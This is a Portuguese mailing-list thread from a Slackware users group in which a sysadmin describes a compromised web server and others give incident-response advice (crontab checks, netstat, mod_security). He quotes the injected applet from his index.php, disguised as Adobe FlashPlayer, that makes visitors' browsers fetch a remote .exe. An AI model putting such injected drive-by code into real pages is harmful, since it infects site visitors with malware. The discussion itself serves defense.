Nunca uso php sem "safe_mode on" :)

Att: Fábio Gomes dos Santos

Victório escreveu:
> Vamos lá. Eu já passei por isso algumas vezes e, em todos os meus casos foi
> falha de programação do site rodando no servidor. Fora todas as dicas que o
> pessoal já disse:
> 
> 1. Verifique se foram adicionados agendamentos no seu cron:
> 
> for i in `cat /etc/passwd|cut -d: -f1`; do echo user: $i; crontab -u $i -l;
> done
> 
> 2. Verifique por arquivos estranhos em _todos_ os diretórios com permissão
> de escrita para todos os usuários, por ex.
> 
> /tmp
> /var/tmp
> /var/spool/* (sim temos diretórios abertos no /var/spool)
> 
> muitos arquivos estão em como /var/tmp/.../botircmaldito
> 
> 3. Pesquise em todos os diretórios do seu servidor web por arquivos cujo
> dono seja o usuário do seu servidor web para tentar descobrir mais arquivos
> suspeitos. Provavelmente você deve ter um phpshell no seu servidor para
> facilitar a vida do cara que jogou o vírus aí.
> 
> 4. Verifique os processos que tem conexões com a internet. 2 servidores meus
> tiveram bot irc e os nomes dos processos estavamos escondidos com o xhide
> (programinha muito bom). Você pode usar o netstat. como netstat -anp |grep
> -vi unix (isso é o basico mas já pega muita coisa)
> 
> 5. Se seu servidor já estava com todos os softwares atualizados, então a
> chance de ser uma falha em alguns deles é pequena. Nesse caso o cara deve
> ter jogado os arquivos por algum site no seu servidor que permita o upload
> de arquivos.
> 
> 6. Muito trabalhoso, mas tente colocar o mod_security no apache. Pelo menos
> coloque ele no modo de DetectionOnly para ter os logs
> 
> ###############################################
> Victório Felipe
> http://www.wa.pro.br
> linux user #306117 - counter.li.org
>         Slackware Linux                          FreeBSD
>               Because it works!                     The Power To Serve
> ###############################################
> 
> 
> 2009/8/11 Jorge Filho <[email protected]>
> 
>> Olá pessoal, obrigado pelas ajudas.
>> O que eu consegui rastrear até agora foi o seguinte, o cara conseguiu
>> editar o index.php do site e colocou o seguinte applet:
>>
>> <applet name="Adobe FlashPlayer" code="Inicio.class" archive="
>> http://www.exemplo.com/audio/FlashPlayer.jar"; height="10" width="1">
>>       <param name="url" value="
>> http://merlincosmeticos.com.br/cache/foto125.exe";>
>> </applet>
>>
>> Ele também adicionou esse FlashPlayer.jar no diretório audio do servidor, e
>> tinha também esse arquivo asd.html na raiz.
>> As datas dos arquivos são:
>>
>> -rw------- 1 www-data www-data 9,8K 2009-08-10 22:53 FlashPlayer.jar
>> -r-xr-xr-x 1 www-data www-data  12K 2009-08-11 14:03 index.php
>>
>> No logo do /var/log/apache/access.log está o seguinte:
>>
>> 201.78.54.160 - - [10/Aug/2009:15:03:17 -0300] "GET /asd.html HTTP/1.1" 200
>> 808 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.0.13)
>> Gecko/2009073022 Firefox/3.0.13"
>> 189.26.198.238 - - [10/Aug/2009:15:07:01 -0300] "GET /asd.html HTTP/1.1"
>> 200 808 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.1.2)
>> Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)"
>> 189.26.198.238 - - [10/Aug/2009:15:07:39 -0300] "GET /asd.html HTTP/1.1"
>> 304 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.1.2)
>> Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)"
>> 189.26.198.238 - - [10/Aug/2009:15:09:43 -0300] "GET /asd.html HTTP/1.1"
>> 304 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.1.2)
>> Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)"
>> 201.89.53.126 - - [10/Aug/2009:15:48:12 -0300] "GET /asd.html HTTP/1.1" 200
>> 808 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0;
>> SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.30618)"
>>
>> Se procurar FlashPlayer.jar no log então, acha muito, porque muita gente
>> deve ter baixado.
>>
>> Outra coisa que acho que pode ser uma falha na segurança também é que todos
>> os arquivos estavam com permissão 777
>>
>> Sobre o ftp, tem alguns usuários com senha fraca sim, mais o ftp roda em
>> chroot com autenticação mysql, o usuário já cai na pasta sem ter como sair,
>> acho dificil ter acontecido algo pelo ftp, mas claro, nada é impossível.
>>
>> Vou analisar mais coisas aqui, mas to meio confuso, é a primeira vez que
>> tenho um ataque no servidor, situação estranha, mais agora tenho que
>> aprender como o cara fez isso pra consertar o que tá errado.
>>
>>
>> 2009/8/11 Herbert Faleiros <[email protected]>
>>
>>
>>> On Tue 11 Aug 2009 18:19:12 Jorge Filho wrote:
>>>> Hoje aconteceu algo muito estranho no meu server web, de manhã, quando
>>>> alguém entrava no site aparecia uma tela pedindo pra executar um
>>>> javascript. Qual não foi minha surpresa quando vi um arquivo diferente
>>> na
>>>> raiz do meu site, com nome de asd.html?
>>>>
>>>> Com é possível isso ter acontecido? Que tipo de configuração eu devo
>>>> verificar se tem problema? Fiquei sem saber o que fazer.
>>>
>>> examine seus logs, com certeza vai encontrar mais informações... Verifique
>>> os
>>> softwares em execução e procure atualizações de segurança. Execute
>>> ferramentas
>>> p/ buscar por rootkits e exploits e verifique quem tem mais acesso ao seu
>>> sistema (tá com cara de que isso foi "manual").
>>>
>>> --
>>> Herbert
>>>
>>>
>>>
>>>
> 
> > 
> 


--~--~---------~--~----~------------~-------~--~----~
GUS-BR - Grupo de Usuários de Slackware Brasil
http://www.slackwarebrasil.org/
http://groups.google.com/group/slack-users-br

Antes de perguntar:
http://www.istf.com.br/perguntas/

Para sair da lista envie um e-mail para:
[email protected]
-~----------~----~----~----~------~----~------~--~---

Responder a